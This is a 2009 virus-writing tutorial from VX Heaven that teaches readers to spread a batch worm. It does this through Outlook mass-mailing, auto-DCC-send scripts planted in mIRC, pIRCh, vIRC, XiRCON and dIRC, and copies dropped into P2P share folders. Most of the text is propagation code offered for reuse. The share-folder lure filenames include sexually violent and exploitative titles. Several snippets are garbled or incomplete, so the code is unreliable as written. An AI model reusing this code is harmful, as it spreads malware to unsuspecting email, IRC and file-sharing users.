VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

Batch IRC/Outlook Spreading

cOrRuPt G3n3t!x
July 2009

[Back to index] [Comments]

Welcome back to my 3rd batch tutorial of which we shall now discuss how to spread your batch virus over IRC (Internet Chat Relay) and MS Outlook. I have seen many different methods, but these seem to be the best so far. I will show how to spread over mIRC, pIRCh, VIRC, dIRC, XiRCON, KazaA, morpheus, limewire, bearshare etc... I would like to say thanks to SPTH for some of his IRC scripts although i needed to edit some as it would not run on my system! Please remember all these scripts are working BATCH scripts!

1)MS Outlook:

MS Outlook has for many years been an excellent way of spreading virii. The actual script to spread over MS Outlook is a VBS but we shall adapt it to be able to work in batch. See below:

echo.on error resume next>>C:\MSO.vbs 
echo.dim a,b,c,d,e>>C:\MSO.vbs 
echo.set a=Wscript.CreateObject("Wscript.Shell")>>C:\MSO.vbs 
echo.set b=CreateObject("Outlook.Application")>>C:\MSO.vbs 
echo.set c=b.GetNameSpace("MAPI")>>C:\MSO.vbs 
echo.for y=1 To c.AddressLists.Count>>C:\MSO.vbs 
echo.set d=c.AddressLists(y)>>C:\MSO.vbs 
echo.x=1 '>>C:\MSO.vbs
echo.set e=b.CreateItem(0)>>C:\MSO.vbs
echo.for o=1 To d.AddressEntries.Count>>C:\MSO.vbs 
echo.e.Recipients.Add f>>C:\MSO.vbs 
echo.e.Subject="Your Subject here">>C:\MSO.vbs 
echo.e.Body="Your Body here">>C:\MSO.vbs 
echo.f ="">>C:\MSO.vbs>>C:\MSO.vbs
call C:\MSO.vbs
Del C:\MSO.vbs

Next to customize this script for your batch look at lines 15, 16 and 17. You will enter the subject of your e-mail in line 15 then the main body in line 16 an finally where your virus is located in line 17.


Next we will spread over mIRC a well known IRC. mIRC has a long list of possible places it could be installed too so lets begin:

copy %0 "%SystemDrive%\Windows\WinDef.bat"
if exist "%SystemDrive%\mirc" goto m1
if exist "%ProgramFiles%\mirc" goto m2
goto piRCh
echo.set fso=CreateObject("Scripting.FileSystemObject")>>C:\mscript.vbs
echo.set scriptini=fso.CreateTextFile("C:\mirc\script.ini")>>C:\mscript.vbs 
echo.scriptini.WriteLine "[script]">>C:\mscript.vbs
echo.scriptini.WriteLine "n0=on 1:JOIN:#:{">>C:\mscript.vbs
echo.scriptini.WriteLine "n1=  /if ( $nick == $me ) { halt }">>C:\mscript.vbs 
echo.scriptini.WriteLine "n2=  /.dcc send $nick c:\windows\WinDef.bat">>C:\mscript.vbs
echo.scriptini.WriteLine "n3=}">>C:\mscript.vbs
call C:\mscript.vbs
del C:\mscript.vbs
goto pIRCh
echo.set fso=CreateObject("Scripting.FileSystemObject")>>C:\mscript.vbs
echo.set scriptini=fso.CreateTextFile("C:\Program Files\mirc\script.ini")>>C:\mscript.vbs 
echo.scriptini.WriteLine "[script]">>C:\mscript.vbs
echo.scriptini.WriteLine "n0=on 1:JOIN:#:{">>C:\mscript.vbs
echo.scriptini.WriteLine "n1=  /if ( $nick == $me ) { halt }">>C:\mscript.vbs
echo.scriptini.WriteLine "n2=  /.dcc send $nick c:\windows\WinDef.bat">>C:\mscript.vbs
echo.scriptini.WriteLine "n3=}">>C:\mscript.vbs
call C:\mscript.vbs
del C:\mscript.vbs


Now this is working script for mIRC, all you need to change is the GOTO prameters, according to what you want mIRC to goto which are lines 3 and 15, next you will have to also change where your virus is allocated lines 1, 10 and 22 near the end of the statement! All this will do is make the script in C:\ directory, call it and then delete it.


Another well known IRC which we shall spread through. See below for the working batch script:

If not exist "C:\Pirch98" goto kazaA
if exist "%SystemDrive%\Pirch98" goto p_inf
copy %0 "%SystemDrive%\Pirch98\WinDef.bat"
echo.Dim pirch>>C:\pirch.vbs
echo.set fso=CreateObject("Scripting.FileSystemObject")>>C:\pirch.vbs
echo.set pirch=fso.CreateTextFile("C:\pirch98\events.ini")>>C:\pirch.vbs
echo.pirch.WriteLine "[Levels]">>C:\pirch.vbs
echo.pirch.WriteLine "Enabled=1">>C:\pirch.vbs
echo.pirch.WriteLine "Count=6">>C:\pirch.vbs
echo.pirch.WriteLine "Level1=000-Unknows">>C:\pirch.vbs
echo.pirch.WriteLine "000-UnknowsEnabled=1">>C:\pirch.vbs
echo.pirch.WriteLine "Level2=100-Level 100">>C:\pirch.vbs
echo.pirch.WriteLine "100-Level 100Enabled=1">>C:\pirch.vbs
echo.pirch.WriteLine "Level3=200-Level 200">>C:\pirch.vbs
echo.pirch.WriteLine "200-Level 200Enabled=1">>C:\pirch.vbs
echo.pirch.WriteLine "Level4=300-Level 300">>C:\pirch.vbs
echo.pirch.WriteLine "300-Level 300Enabled=1">>C:\pirch.vbs
echo.pirch.WriteLine "Level5=400-Level 400">>C:\pirch.vbs
echo.pirch.WriteLine "400-Level 400Enabled=1">>C:\pirch.vbs
echo.pirch.WriteLine "Level6=500-Level 500">>C:\pirch.vbs
echo.pirch.WriteLine "500-Level 500Enabled=1">>C:\pirch.vbs
echo.pirch.WriteLine "[000-Unknowns]">>C:\pirch.vbs
echo.pirch.WriteLine "User1=*!*@*">>C:\pirch.vbs
echo.pirch.WriteLine "UserCount=1">>C:\pirch.vbs
echo.pirch.WriteLine "Events1=ON JOIN:#: /dcc send $nick C:\Pirch98\Windef.bat">>C:\pirch.vbs
echo.pirch.WriteLine "EventCount=1">>C:\pirch.vbs
echo.pirch.WriteLine "[100-Level 100]">>C:\pirch.vbs
echo.pirch.WriteLine "UserCount=0">>C:\pirch.vbs
echo.pirch.WriteLine "EventCount=0">>C:\pirch.vbs
echo.pirch.WriteLine "[200-Level 200]">>C:\pirch.vbs
echo.pirch.WriteLine "UserCount=0">>C:\pirch.vbs
echo.pirch.WriteLine "EventCount=0">>C:\pirch.vbs
echo.pirch.WriteLine "[300-Level 300]">>C:\pirch.vbs
echo.pirch.WriteLine "UserCount=0">>C:\pirch.vbs
echo.pirch.WriteLine "EventCount=0">>C:\pirch.vbs
echo.pirch.WriteLine "[400-Level 400]">>C:\pirch.vbs
echo.pirch.WriteLine "UserCount=0">>C:\pirch.vbs
echo.pirch.WriteLine "EventCount=0">>C:\pirch.vbs
echo.pirch.WriteLine "[500-Level 500]">>C:\pirch.vbs
echo.pirch.WriteLine "UserCount=0">>C:\pirch.vbs
echo.pirch.WriteLine "EventCount=0">>C:\pirch.vbs
call C:\pirch.vbs
del C:\pirch.vbs

There is the full script, once again, GOTO parameters need to be changed accordingly(lines 1 and last line) than also lines 4 and 26 need to be changed according to where your virus is.


Another IRC, pretty simple see below:

if exist "%SystemDrive%\Kazaa" goto vIRC
if exist "%SystemDrive%\Kazaa" goto kazaa_inf
copy %0 "%SystemDrive%\Kazaa"
echo.set fso=CreateObject("Scripting.FileSystemObject")>>C:\k.vbs
echo.set shell=CreateObject("WScript.Shell")>>C:\k.vbs "HKLM\Software\KaZaA\Transfer\DlDir0", "C:\Kazaa">>C:\k.vbs
call C:\k.vbs
del C:\k.vbs

Just make sure you copy your virus into the directory 'C:\Kazaa'!!! By now im sure you've got the hang of changing Parameters! so go ahead you can do it :)


We now see a similar script as above for vIRC just put it under your infection routine and change the paths etc to your batchs':

if exist "%SystemDrive%\Virc" goto v_inf
if not exist "%SystemDrive%\Virc" goto XiRCON
copy %0 "%SystemDrive%\Virc\WinDef.bat"
echo.set fso=CreateObject("Scripting.FileSystemObject")>>C:\v.vbs
echo.set shell=CreateObject("WScript.Shell")>>C:\v.vbs "HKEY_CURRENT_USER\.Default\Software\MeGaLiTh Software\Visual IRC 96\Events\Event17", "dcc send $nick C:\Virc\WinDef.bat">>C:\v.vbs
call C:\v.vbs
del C:\v.vbs

6) XiRCON:

This is a IRC spreading technique for XiRCON just change paths and names for your batch(Thanks to SPTH):

IF EXIST "%SystemDrive%\Program Files\XiRCON\Default.tcl" goto inf_xircon
IF NOT EXIST "%SystemDrive%\Program Files\XiRCON\Default.tcl" GOTO dIRC
echo.set fso=CreateObject("Scripting.FileSystemObject")>>C:\xi.vbs
echo.set xi=fso.CreateTextFile("C:\Default.tcl")>>C:\xi.vbs
echo.xi.writeline " on ctcp {">>C:\xi.vbs
echo.xi.writeline " foreach n [channels] {">>C:\xi.vbs
echo.xi.writeline "  if {$n != [my_nick]} {">>C:\xi.vbs
echo.xi.writeline "     /dcc send $n C:\Windows\WinDef.bat">>C:\xi.vbs
echo.xi.writeline "   }">>C:\xi.vbs
echo.xi.writeline " }">>C:\xi.vbs
echo.xi.writeline "}">>C:\xi.vbs
copy %0 "%SystemDrive%\Virc\WinDef.bat"
del /f /q "%SystemDrive%\Program Files\XiRCON\Default.tcl"
call C:\xi.vbs
del C:\xi.vbs
copy "C:\Default.tcl" "%SystemDrive%\Program Files\XiRCON\Default.tcl"


There are a bit more options on this script, you can either add your new script to the existing one or make a whole new one entirely, SPTH decided to make a new one so let us go with his advice as above just change paths and goto parameter as needed by your batch:

if exist "%SystemDrive%\Programme\Dragonmount Networks\dIRC\scripts" goto inf_dirc >nul
if exist not "%SystemDrive%\Programme\Dragonmount Networks\dIRC\scripts" goto randomspread
copy %0 "%SystemDrive%\Windows\WinDef.bat"
echo.set fso=CreateObject("Scripting.FileSystemObject")>>C:\dirc.vbs
echo.set dirc=fso.CreateTextFile("C:\virus.dsf")>>C:\dirc.vbs
echo.dirc.writeline "#commands">>C:\dirc.vbs
echo.dirc.writeline "#VBScript">>C:\dirc.vbs
echo.dirc.writeline "!!! Do not edit the contents of this file. !!!">>C:\dirc.vbs
echo.dirc.writeline "">>C:\dirc.vbs
echo.dirc.writeline "#EVENT# vir Join     *     *     on">>C:\dirc.vbs
echo.dirc.writeline "sendcommand /dcc send  & Nick &  C:\Windows\WinDef.bat">>C:\dirc.vbs
echo.dirc.writeline "===">>C:\dirc.vbs
call C:\dirc.vbs
del C:\dirc.vbs
copy "C:\virus.dsf" "%SystemDrive%\Programme\Dragonmount Networks\dIRC\scripts" >nul 
echo.C:\Programme\Dragonmount Networks\dIRC\scripts\standard.dsf     commands     VBScript>>scripts.drc
echo.C:\Programme\Dragonmount Networks\dIRC\scripts\virus.dsf     commands     VBScript>>scripts.drc

8)Random Share Spread:

This is just random spreading through a multitude of different shareware sites: just add to the spread routine in your code:

COPY %0 "%SystemDrive%\mydocu~1\Crysis_keygen.exe" >nul
COPY %0 "%SystemDrive%\mydocu~1\Kaspersky_Antivirus_10_Limited_Edition.url.exe" >nul
COPY %0 "%SystemDrive%\kazaa\myshar~1\FHM_2009_MODELS.jpg.exe" >nul
COPY %0 "%ProgramFiles%\applej~1\incoming\Windows_Vista_Crack.exe" >nul
COPY %0 "%ProgramFiles%\bearsh~1\shared\XXX_SITE_PASSWORDS.exe" >nul
COPY %0 "%ProgramFiles%\eDonkey2000\incoming\Teen_Forced_To_Suck.wmv.exe" >nul
COPY %0 "%ProgramFiles%\emule\incoming\Windows7_RC1_Downloader.exe" >nul
COPY %0 "%ProgramFiles%\grokster\mygrok~1\ICE_AGE_3.wmv.exe" >nul
COPY %0 "%ProgramFiles%\icq\shared~1\Norton_AV_2009_CRACKED.exe.exe" >nul
COPY %0 "%ProgramFiles%\kazaa\myshar~1\EBONY_WHORE_RAPED.mp4.exe" >nul
COPY %0 "%ProgramFiles%\kazaal~1\myshar~1\VisualC_Keygen_2009.exe" >nul
COPY %0 "%ProgramFiles%\kmd\myshar~1\EXPLOITED_ASIANS.wmv.exe" >nul
COPY %0 "%ProgramFiles%\limewire\shared\ASS_LICKERS.MOV.exe" >nul
COPY %0 "%ProgramFiles%\morpheus\myshar~1\Hard_Russian_rape.wmv.exe" >nul
COPY %0 "%ProgramFiles%\overnet\bundles\Virgins_1st_fuck.mp4.exe" >nul

I have been writing this tutorial for well over 2 hours now, so it's time for me to go, be sure to look out for my next tutorial coming soon - This weekend im just relaxing, but it will most likely be a theory on batch keylogging but is definitely worth a look im. If you have any bugs or queries e-mail them to me at [email protected] and i'll do my best to help. Remember this is for educational purpose only! ;) Keep on coding!! This is Corrupt Genetix signing out.

[Back to index] [Comments]
By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! aka